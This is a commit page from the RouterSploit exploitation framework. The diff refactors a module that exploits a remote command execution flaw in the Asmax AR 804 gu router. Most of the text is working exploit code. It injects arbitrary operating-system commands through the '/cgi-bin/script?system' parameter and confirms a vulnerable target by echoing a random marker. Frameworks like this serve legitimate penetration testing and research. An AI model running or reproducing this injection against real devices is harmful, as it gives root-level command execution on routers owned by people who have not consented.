Commit 50ab6c9b by Marcin Bury

Replacing requests with http_request.

parent c5636986
import requests
from routersploit import ( from routersploit import (
exploits, exploits,
print_success, print_success,
print_status, print_status,
print_error, print_error,
sanitize_url, sanitize_url,
http_request,
random_text,
mute,
) )
...@@ -22,11 +23,12 @@ class Exploit(exploits.Exploit): ...@@ -22,11 +23,12 @@ class Exploit(exploits.Exploit):
], ],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.', 'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'references': [ 'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise' 'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
], ],
'targets': [ 'targets': [
'Asmax AR 804 gu' 'Asmax AR 804 gu',
] ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
...@@ -49,25 +51,20 @@ class Exploit(exploits.Exploit): ...@@ -49,25 +51,20 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
try: try:
r = requests.get(url) response = http_request(method="GET", url=url, verify=False).text
except requests.exceptions.MissingSchema: except AttributeError:
return "Invalid URL format: %s" % url return ""
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
return r.text return response
@mute
def check(self): def check(self):
cmd = "id" mark = random_text(32)
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) cmd = "echo {}".format(mark)
try: response = self.execute(cmd)
r = requests.get(url)
res = r.text
except:
return None
if "uid" in res: if mark in response:
return True return True
return False return False
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment